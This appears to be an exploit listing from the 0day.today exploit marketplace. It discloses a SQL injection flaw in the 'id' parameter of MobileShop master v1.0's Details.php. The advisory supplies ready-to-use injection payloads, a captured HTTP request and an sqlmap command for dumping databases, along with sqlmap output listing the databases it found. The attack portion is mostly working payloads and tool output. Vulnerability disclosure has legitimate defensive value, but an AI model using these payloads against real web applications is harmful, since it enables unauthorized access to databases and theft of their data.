0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MobileShop master v1.0 - SQL Injection Vulnerability
+ Exploit Title: MobileShop master v1.0 - SQL Injection Vuln. + Exploit Author: "HAZIM ARBAŞ" from EMA Security LTD - Siber Güvenlik ve Bilişim Hizmetleri (https://emasecurity.com) + Vendor Homepage: https://code-projects.org/mobile-shop-in-php-css-javascript-and-mysql-free-download/ + Software Link: https://download-media.code-projects.org/2020/04/Mobile_Shop_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip + Tested on: Windows 10 Pro + CWE: CWE-89 + CVSS: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + Type: WebApps + Platform: PHP ## References: + https://cwe.mitre.org/data/definitions/89.html + https://owasp.org/Top10/A03_2021-Injection/ ## Description: The MobileShop-master application is susceptible to SQL Injection through the 'id' parameter in "/MobileShop-master/Details.php". Exploiting this vulnerability could lead to severe consequences, including unauthorized access, data manipulation, and potential exploitation of other vulnerabilities within the underlying database. It is imperative to address this issue promptly to mitigate the risk of compromise and ensure the security and integrity of the application and its data. ## Proof of Concept: + Go to the Login page: "http://localhost/MobileShop-master/Login.html" + Fill email and password. + Select any product and intercept the request via Burp Suite, then send it to Repeater. + Change the 'id' value to any of the below payloads. + Send the request ## Payloads: + id=1' AND 9071=9071 AND 'EtdU'='EtdU + id=1' AND (SELECT 7012 FROM(SELECT COUNT(*),CONCAT(0x7176787071,(SELECT (ELT(7012=7012,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'wwwk'='wwwk + id=1' UNION ALL SELECT NULL,CONCAT(0x7176787071,0x7867535464594a544c58796246766f6a444c4358426b596c71724b59676455644b66794858734670,0x7171717671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - + Or you can write your own payloads ## Proof of Concept Using SqlMap: + Go to the Login page: "http://localhormst/MobileShop-master/Login.html" + Fill email and password. + Select any product and intercept the request via Burp Suite, then send it to Repeater. + Copy to File the request to a "sql.txt" file. + Run the following sqlmap command + sqlmap -r sql.txt -p id --dbs ``` POST /MobileShop-master/Details.php HTTP/1.1 Host: localhost Content-Length: 42 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://localhost/MobileShop-master/MobilesList.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=mh3mnpf51bj2q17hg8sipbltnn Connection: close id=1 ``` + Use sqlmap to exploit. In sqlmap, use 'id' parameter to dump the database. ``` sqlmap -r sql.txt -p id --dbs ``` ``` --- Parameter: id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 9071=9071 AND 'EtdU'='EtdU Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1' AND (SELECT 7012 FROM(SELECT COUNT(*),CONCAT(0x7176787071,(SELECT (ELT(7012=7012,1))),0x7171717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'wwwk'='wwwk Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 7380 FROM (SELECT(SLEEP(5)))rlmI) AND 'blrN'='blrN Type: UNION query Title: Generic UNION query (NULL) - 13 columns Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x7176787071,0x7867535464594a544c58796246766f6a444c4358426b596c71724b59676455644b66794858734670,0x7171717671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- [04:17:04] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.2.12, Apache 2.4.58 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [04:17:04] [INFO] fetching database names [04:17:05] [INFO] resumed: 'information_schema' [04:17:05] [INFO] resumed: '1' [04:17:05] [INFO] resumed: '3' [04:17:05] [INFO] resumed: 'admidio' [04:17:05] [INFO] resumed: 'calender' [04:17:05] [INFO] resumed: 'corregidor' [04:17:05] [INFO] resumed: 'gym' [04:17:05] [INFO] resumed: 'joomla_db' [04:17:05] [INFO] resumed: 'linkstack' [04:17:05] [INFO] resumed: 'mobileshop' [04:17:05] [INFO] resumed: 'mysql' [04:17:05] [INFO] resumed: 'nickey' [04:17:05] [INFO] resumed: 'performance_schema' [04:17:05] [INFO] resumed: 'phpmyadmin' [04:17:05] [INFO] resumed: 'rcms' [04:17:05] [INFO] resumed: 'smith' [04:17:05] [INFO] resumed: 'telephone' [04:17:05] [INFO] resumed: 'test' [04:17:05] [INFO] resumed: 'valente' ``` # 0day.today [2024-07-02] #